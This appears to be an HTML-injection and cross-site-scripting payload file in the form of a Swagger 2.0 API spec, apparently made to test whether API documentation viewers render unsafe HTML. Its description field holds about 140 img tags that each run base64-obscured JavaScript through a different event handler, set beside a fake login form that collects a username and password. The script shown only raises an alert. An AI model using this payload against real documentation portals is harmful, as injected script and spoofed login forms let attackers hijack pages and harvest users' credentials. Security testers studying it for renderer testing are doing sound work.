swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: |
    <div class="login-form">
      <div class="heading">
        <h1>HTML Injection : Fake Login</h1>
        <img src=x onerror="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onafterprint=="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onanimationcancel="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onanimationend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onanimationiteration="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onanimationstart="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onauxclick="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onbeforecopy="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onbeforecut="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onbeforeinput="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onbeforepaste="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onbeforeprint="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onbeforetoggle="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onbeforeunload="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onbegin="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onblur="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncancel="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncanplay="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncanplaythrough="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onchange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onclick="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onclose="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncommand="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncontentvisibilityautostatechange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncontentvisibilityautostatechange(hidden)="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncontextmenu="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncopy="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncuechange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oncut="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondblclick="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondrag="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondragend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondragenter="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondragexit="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondragleave="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondragover="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondragstart="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondrop="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ondurationchange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onended="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onerror="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onfocus="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onfocus(autofocus)="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onfocusin="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onfocusout="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onformdata="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onfullscreenchange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ongesturechange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ongestureend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ongesturestart="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ongotpointercapture="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onhashchange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oninput="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x oninvalid="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onkeydown="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onkeypress="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onkeyup="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onload="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onloadeddata="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onloadedmetadata="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onloadstart="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onlostpointercapture="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmessage="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmousedown="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmouseenter="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmouseleave="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmousemove="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmouseout="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmouseover="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmouseup="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmousewheel="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onmozfullscreenchange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpagehide="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpagereveal="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpageshow="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpageswap="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpaste="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpause="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onplay="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onplaying="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpointercancel="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpointerdown="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpointerenter="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpointerleave="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpointermove="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpointerout="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpointerover="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpointerrawupdate="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpointerup="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onpopstate="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onprogress="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onratechange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onrepeat="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onreset="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onresize="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onscroll="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onscrollend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onscrollsnapchange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onscrollsnapchanging="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onsearch="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onsecuritypolicyviolation="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onseeked="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onseeking="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onselect="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onselectionchange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onselectstart="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onsubmit="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onsuspend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontimeupdate="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontoggle="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontoggle(popover)="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontouchcancel="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontouchend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontouchmove="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontouchstart="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontransitioncancel="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontransitionend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontransitionrun="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x ontransitionstart="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onunhandledrejection="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onunload="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onvolumechange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwaiting="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwaiting(loop)="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitanimationend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitanimationiteration="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitanimationstart="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitfullscreenchange="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitmouseforcechanged="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitmouseforcedown="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitmouseforceup="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitmouseforcewillbegin="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitplaybacktargetavailabilitychanged="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitpresentationmodechanged="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkittransitionend="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwebkitwillrevealbottom="eval(atob('YWxlcnQoJ1hTUycp'))">
        <img src=x onwheel="eval(atob('YWxlcnQoJ1hTUycp'))">
      </div>
      <div class="form-container">
        <form action="https://example.com/login" method="post" class="form-signin">
          <div class="form-group">
            <label for="username">Username</label>
            <input type="text" name="username" size="20">
          </div>
          <div class="form-group">
            <label for="password">Password</label>
            <input type="password" name="password" size="20">
          </div>
          <div class="form-group">
            <button type="submit" class="btn btn-default">Login</button>
          </div>
        </form>
      </div>
    </div>
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
